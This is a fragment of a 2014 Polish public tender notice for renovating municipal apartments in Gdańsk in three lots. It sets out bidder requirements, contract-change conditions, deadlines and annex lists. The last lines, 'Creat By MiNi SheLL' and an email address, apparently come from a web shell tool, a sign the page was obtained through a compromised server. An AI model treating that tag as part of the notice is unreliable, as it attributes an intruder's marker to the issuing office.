<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Złożyć Druk OFERTA, który należy sporządzić wg wzoru druku zamawiającego.<br>
b)	Podać w złożonej ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcy lub nazwy 	podwykonawców, na których zasoby wykonawca powołuje się, w celu wykazania spełnienia warunku udziału w 	postępowaniu. W przypadku nie wskazania podwykonawców, zamawiający uzna, że całość zamówienia będzie 	wykonywana przez Wykonawcę osobiście.<br>
c)	Udzielić rękojmi za wady na okres 3 lat.<br>
d)	Złożyć Kosztorysy ofertowe  (uproszczone), wg przedmiarów robót Zamawiającego odpowiednio na wybrane 	zadanie.<br>
e)	Złożyć Zbiorcze zestawienie materiałów wraz z przyjętymi cenami odpowiednio na wybrane zadanie. Brak 	zestawienia spowoduje odrzucenie oferty.<br>
f)	Złożyć druk Zestawienie kosztorysów odpowiednio na wybrane zadanie, który należy sporządzić wg wzoru druku 	Zamawiającego.<br>
g)	Załączyć kopię dowodu wpłaty wadium wpłaconego w pieniądzu lub oryginał albo kopię wadium  wniesionego w 	jednej z form określonych w punkcie 15 SIWZ.<br>
h)	Wykazać, że oferta została podpisana przez osobę(y) uprawnioną(e) do występowania w imieniu i na rzecz Wykonawcy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Następujące postanowienia umowy mogą ulec zmianie: <br>
1)	Przesunięciu może ulec termin wykonania przedmiotu zamówienia.<br>

2)	Zmianie może ulec osoba Kierownika budowy lub Kierownika robót, jako przedstawicieli Wykonawcy pod warunkiem wcześniejszego powiadomienia Zamawiającego o tym fakcie.<br>
   
3)	Zmiana lub rezygnacja z podwykonawcy, na którego zasoby wykonawca powoływał się na zasadach określonych w art. 26 ust. 2b ustawy prawo zamówień publicznych, w celu wykazania spełniania warunków udziału w postępowaniu.<br>

4)	Możliwość realizacji umowy przez podwykonawców (zawarcie umów o podwykonawstwo) na etapie jej realizacji, w przypadku braku zadeklarowania realizacji zamówienia przy pomocy podwykonawców na etapie składania ofert.<br>

Zmiany w umowie mogą zostać wprowadzone przy zaistnieniu następujących okoliczności:<br>

1)	Wstrzymania robót przez zamawiającego lub przerwy w wykonywaniu robót powstałe na skutek okoliczności, za które odpowiedzialność ponosi zamawiający.<br>

2)	Konieczności wykonania robót dodatkowych lub innych robót budowlanych, nieobjętych zamówieniem podstawowym, których wykonanie stanie się konieczne, a wykonanie zamówienia podstawowego będzie uzależnione od wykonania tych robót.<br>

3)	Konieczności uzyskania decyzji pozwolenia na budowę na wymianę stolarki okiennej.<br>

4)	Konieczności złożenia zgłoszenia na wymianę stolarki okiennej i związanego z tym czasu oczekiwania jego przyjęcia.<br>

5)	Konieczności uzyskania nowych warunków technicznych na dostawę mediów do lokali.<br>

6)	Konieczności podjęcia uchwały przez wspólnotę mieszkaniową z uwagi na ingerencję w części nieruchomości wspólnej np. klatka schodowa, piwnice, instalacje sanitarne, wlz, przewody kominowe, itp.<br>

7)	W przypadku wystąpienia okoliczności wymienionych w pkt 1, 2 termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia robót budowlanych w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. <br>

8)	W przypadku nie przekazania Wykonawcy przez Zamawiającego decyzji pozwolenia na budowę lub  informacji, że zgłoszenie zostało przyjęte, warunków technicznych, uchwał podjętych przez wspólnoty mieszkaniowe, tj. dokumentów wymienionych w pkt 3, 4, 5, 6  w ciągu 6 tygodni  (dotyczy zadania 1 i 3) lub 4 tygodni (dotyczy zadania 2)  od dnia podpisania umowy, termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia robót budowlanych w sposób należyty, nie dłużej jednak niż o okres opóźnienia w przekazaniu w/w dokumentów.<br>

9)	Zmiana osoby Kierownika budowy lub Kierownika robót może nastąpić z przyczyn losowych, niezależnych od Zamawiającego i Wykonawcy np. śmierci, choroby lub w przypadku rozwiązania przez Wykonawcę umowy z Kierownikiem budowy lub Kierownikami robót, itp. Zamawiający zaakceptuje zmianę Kierownika budowy lub Kierownika robót, gdy kwalifikacje i doświadczenie wskazanych osób będą spełniać warunki postawione w tym zakresie w specyfikacji istotnych warunków zamówienia.<br>

10)	Zmiana lub rezygnacja z podwykonawcy, na którego zasoby wykonawca powoływał się na zasadach określonych w art. 26 ust. 2b ustawy prawo zamówień publicznych, w celu wykazania spełniania warunków udziału w postępowaniu  jest możliwa w przypadku wykazania przez wykonawcę, iż proponowany inny podwykonawca (lub wykonawca samodzielnie) spełnia dany warunek udziału w postępowaniu w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.<br>

11)	Realizacja umowy przez podwykonawców (zawarcie umów o podwykonawstwo) na etapie jej wykonywania w przypadku braku zadeklarowania przeprowadzenia zamówienia przy pomocy podwykonawców na etapie składania ofert jest możliwa, pod warunkiem uzyskania zgody Zamawiającego i jeżeli w stosunku do części zamówienia, na którą ma być zawarta umowa o podwykonawstwo nie została wyłączona dopuszczalność podwykonawstwa</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gznk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 80-171 Gdańsk, ul Cygańska Góra 1, pok. nr 11 w godz. 9:00 - 12:00. <br>
Cena brutto - 61,50 PLN.<br>
Warunki i sposób płatności: gotówka, przelew, zaliczenie pocztowe.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2014 godzina 10:00, miejsce: siedziba Zamawiającego, 80-171 Gdańsk, ul. Cygańska Góra 1, pokój nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 23.05.2014.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> DATA, GODZINA I MIEJSCE OTWARCIA OFERT  24.04.2014 r. godzina 10:15 <br>
miejsce w siedzibie zamawiającego 80-171 Gdańsk, ul. Cygańska Góra 1, pokój nr 6, świetlica<br>

OSOBY UPRAWNIONE DO POROZUMIEWANIA SIĘ Z WYKONAWCAMI <br>
Grażyna Pietrowska stanowisko służbowe specjalista ds. zamówień publicznych,<br> 
80- 171 Gdańsk ul. Cygańska Góra 1, nr pok. 11, tel.  58 320 02 20 <br>
Adres poczty elektronicznej: pietrowska@gznk.pl.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie robót  remontowych lokali mieszkalnych przy ulicach: Zdrojowej 1 m 1 i 2, Starowiślnej  6A m 3,  Rybitwy 7 m 2A, Suchej 2 m 1,  Władysława IV 20 m 2  w Gdańsku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót  remontowych lokali mieszkalnych przy ulicach: Zdrojowej 1 m 1 i 2, Starowiślnej  6A m 3,  Rybitwy 7 m 2A, Suchej 2 m 1,  Władysława IV 20 m 2  w Gdansku.<br>

Szczegółowy zakres robót dla każdego lokalu mieszkalnego określony jest w przedmiarach dla poszczególnych lokali.<br> 
1)	Arkusz inwentaryzacyjny - lokal mieszkalny nr 1 przy ul. Zdrojowej  1 - załącznik nr 5 do siwz.<br>

2)	Rysunek - szkic lokalu mieszkalnego nr 1 w budynku przy ul. Zdrojowej 1 w Gdańsku -	załącznik nr 5.1 do siwz.<br>

3)	Przedmiar - Remont lokalu mieszkalnego Gdańsk ul. Zdrojowa 1 m 1 - branża ogólnobudowlana -załącznik nr 5.2 do siwz.<br>

4)	Przedmiar - Remont instalacji sanitarnych w mieszkaniu ul. Zdrojowa 1 m 1 - branża sanitarna - załącznik nr 5.3 do siwz.<br>

5)	Przedmiar - Wymiana instalacji elektrycznej  w lokalu nr 1 Gdańsk ul. Zdrojowa 1  - branża 	elektryczna - załącznik nr 5.4 do siwz.<br>

6)	Arkusz inwentaryzacyjny - lokal mieszkalny nr 2 przy ul. Zdrojowej 1 - załącznik nr 6 do siwz.<br>

7)	Rysunek - szkic lokalu mieszkalnego nr 2 w budynku przy ul. Zdrojowej 1 w Gdańsku -	załącznik nr 6.1 do siwz.<br>

8)	Przedmiar - Remont mieszkania Gdańsk ul. Zdrojowa 1 m 2 - branża ogólnobudowlana - załącznik nr 6.2 do siwz.<br>

9)	Przedmiar - Remont instalacji sanitarnych w mieszkaniu ul. Zdrojowa 1 m 2 - branża sanitarna - załącznik nr 6.3 do siwz.<br>

10)	Przedmiar - Wymiana instalacji elektrycznej  w lokalu nr 2 Gdańsk ul. Zdrojowa 1 - branża elektryczna - załącznik nr 6.4 do siwz.<br>

11)	Arkusz inwentaryzacyjny - lokal mieszkalny nr 3 przy ul. Starowiślna 6A - załącznik nr 7 do siwz.<br>

12)	Rysunek - szkic lokalu mieszkalnego  przy ul. Starowiślna 6A m 3 w Gdańsku - załącznik nr 7.1 do siwz<br>

13)	Przedmiar - Remont lokalu ul. Starowiślna 6A m 3- branża ogólnobudowlana - załącznik nr 7.2 do siwz.<br>

14)	Przedmiar - Remont instalacji wod-kan.  ul. Starowiślna 6A m 3 - branża budowlana, sanitarna - załącznik nr 7.3 do siwz.<br>

15)	Przedmiar - Wymiana instalacji elektrycznej w lokalu nr 3 Gdańsk ul. Starowiślna 6A - branża elektryczna - załącznik nr 7.4 do siwz.<br>

16)	Arkusz inwentaryzacyjny - lokal mieszkalny nr 2A przy ul. Rybitwy 7 - załącznik nr 8 do siwz.<br>

17)	Rysunek - szkic  lokal mieszkalny nr 2A przy ul. Rybitwy 7 - załącznik nr 8.1 do siwz.<br>

18)	Przedmiar - Remont lokalu ul. Rybitwy 7 m 2A- branża ogólnobudowlana - załącznik nr 8.2 do siwz.<br>

19)	Przedmiar - Remont instalacji wod-kan.  ul. Rybitwy 7 m 2A - branża budowlana, sanitarna -załącznik nr 8.3 do siwz.<br>

20)	Przedmiar - Wymiana instalacji elektrycznej w lokalu nr 2A Gdańsk ul. Rybitwy 7 - branża elektryczna - załącznik nr 8.4 do siwz.<br>

21)	Rysunek  - szkic lokalu nr 1 przy ul. Suchej 2  - załącznik nr 9 do siwz. <br>
                                                                                                                                                                                                      
22)	Przedmiar - Remont lokalu ul. Sucha 2/1  - branża ogólnobudowlana - załącznik nr 9.1 do siwz.<br>

23)	Przedmiar - Remont instalacji wod-kan.  ul. Sucha 2 m 1- branża budowlana, sanitarna - załącznik nr 9.2 do siwz.<br>

24)	Przedmiar - Wymiana instalacji elektrycznej w lokalu nr 1 Gdańsk ul. Sucha 2 - branża elektryczna - załącznik nr 9.3 do siwz.<br>

25)	Arkusz inwentaryzacyjny - lokal mieszkalny nr 2 przy ul. Władysława IV 20 - załącznik nr 10 do siwz.<br>

26)	Rysunek - szkic lokalu nr 2 przy ul. Władysława IV 20 - załącznik nr 10.1 do siwz.  <br>
                                      
27)	Przedmiar - Remont lokalu ul. Władysława IV 20/2 - branża ogólnobudowlana - załącznik nr 10.2 do siwz.<br>

28)	Przedmiar - Remont instalacji wod-kan ul. Władysława IV 20/2 - branża budowlana, sanitarna - załącznik nr 10.3 do siwz.<br>

29)	Przedmiar - Wymiana instalacji elektrycznej w lokalu nr 2 Gdańsk ul. Władysława IV 20 - branża elektryczna - załącznik nr 10.4 do siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.00.00-1, 45.11.11.00-9, 45.11.12.20-6, 45.21.00.00-2, 45.26.23.21-7, 45.31.00.00-3, 45.33.22.00-5, 45.33.23.00-6, 45.33.30.00-0, 45.40.00.00-1, 45.41.00.00-4, 45.42.11.31-1, 45.42.11.31-8, 45.42.11.46-9, 45.42.11.52-4, 45.43.00.00-0, 45.43.11.00-8, 45.43.12.00-9, 45.44.21.00-8, 45.45.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie robót  remontowych  lokalu mieszkalnego przy ulicy Miedzianej 6 m 1 w Gdańsku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót  remontowych lokalu mieszkalnego przy ulicy Miedzianej 6 m 1 w Gdańsku.<br>


Szczegółowy zakres robót dla każdego lokalu mieszkalnego określony jest w przedmiarach dla poszczególnych lokali.<br> 
1)	Przedmiar - Remont lokalu mieszkalnego Gdańsk ul. Miedziana 6 m 1 - branża ogólnobudowlana -załącznik nr 11.1 do siwz. <br>
2)	Przedmiar - Remont lokalu mieszkalnego Gdańsk ul. Miedziana 6 m 1 - branża sanitarna - załącznik nr 11.2 do siwz.<br>

3)	Przedmiar - Remont lokalu mieszkalnego Gdańsk ul. Miedziana 6 m 1 - Roboty w zakresie okablowania oraz instalacji elektrycznych - załącznik nr 11.3 do siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.00.00-1, 45.11.11.00-9, 45.11.12.20-6, 45.21.00.00-2, 45.26.23.21-7, 45.31.00.00-3, 45.33.22.00-5, 45.33.23.00-6, 45.33.30.00-0, 45.40.00.00-1, 45.41.00.00-4, 45.42.11.31-1, 45.42.11.31-8, 45.42.11.46-9, 45.42.11.52-4, 45.43.00.00-0, 45.43.11.00-8, 45.43.12.00-9, 45.44.21.00-8, 45.45.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie robót  remontowych  lokali mieszkalnych przy ulicach: Hożej 6b m 8, Ugory 5 m 11 i  3 m 1 w Gdańsku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót  remontowych  lokali mieszkalnych przy ulicach: Hożej 6b m 8, Ugory 5 m 11 i  3 m 1 w Gdańsku. <br>

Szczegółowy zakres robót dla każdego lokalu mieszkalnego określony jest w przedmiarach dla poszczególnych lokali. <br>
1)	Arkusz inwentaryzacyjny - lokal mieszkalny nr 8 przy ul. Hożej 6B - załącznik nr 12 do siwz.<br>

2)	Rysunek - rzut lokalu mieszkalnego nr 8 przy ul. Hożej 6B - załącznik nr 12.1 do siwz.  <br>
                                                      
3)	Przedmiar - Remont lokalu. ul. Hożej 6B m 8 - branża ogólnobudowlana - załącznik nr 12.2 do siwz.<br>

4)	Przedmiar - Remont instalacji wod-kan. i gazowej ul. Hoża 6B m 8 - branża sanitarna - załącznik nr 12.3 do siwz.<br>
5)	Przedmiar - Wymiana instalacji elektrycznej w lokalu nr 8, Gdańsk ul. Hoża 6B - branża elektryczna - załącznik nr 12.4 do siwz.<br>

6)	Arkusz inwentaryzacyjny - lokal mieszkalny nr 11 przy ul. Ugory 5 - załącznik nr 13 do siwz.<br>

7)	Rysunek  - rzut lokalu mieszkalnego nr 11 przy ul. Ugory 5 - załącznik nr 13.1 do siwz.<br>
                                                                                                                                                                                                       
8)	Przedmiar - Remont lokalu ul. Ugory 5 m 11 - branża ogólnobudowlana - załącznik nr 13.2 do siwz.<br>

9)	Przedmiar - Remont instalacji wod-kan.  ul. Ugory 5 m 11 - branża budowlana, sanitarna - załącznik nr 13.3 do siwz.<br>

10)	Przedmiar - Wymiana instalacji elektrycznej w lokalu nr 11 Gdańsk ul. Ugory 5 - branża elektryczna -załącznik nr 13.4 do siwz.<br>

11)	Arkusz inwentaryzacyjny - lokal mieszkalny nr 1 przy ul. Ugory 3 - załącznik nr 14 do siwz.<br>

12)	Rysunek  - rzut lokalu mieszkalnego nr 1 przy ul. Ugory 3 - załącznik nr 14.1 do siwz. <br>
                                                                                                                                                                                                      
13)	Przedmiar - Remont lokalu ul. Ugory 3 m 1 - branża ogólnobudowlana - załącznik nr 14.2 do siwz.<br>

14)	Przedmiar - Remont instalacji wod-kan.  ul. Ugory 3 m 1 - branża budowlana, sanitarna - załącznik nr 14.3 do siwz.<br>

15)	Przedmiar - Wymiana instalacji elektrycznej w lokalu nr 1 Gdańsk ul. Ugory 3 - branża elektryczna -załącznik nr 14.4 do siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.00.00-1, 45.11.11.00-9, 45.11.12.20-6, 45.21.00.00-2, 45.26.23.21-7, 45.31.00.00-3, 45.33.22.00-5, 45.33.23.00-6, 45.33.30.00-0, 45.40.00.00-1, 45.41.00.00-4, 45.42.11.31-1, 45.42.11.31-8, 45.42.11.46-9, 45.42.11.52-4, 45.43.00.00-0, 45.43.11.00-8, 45.43.12.00-9, 45.44.21.00-8, 45.45.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com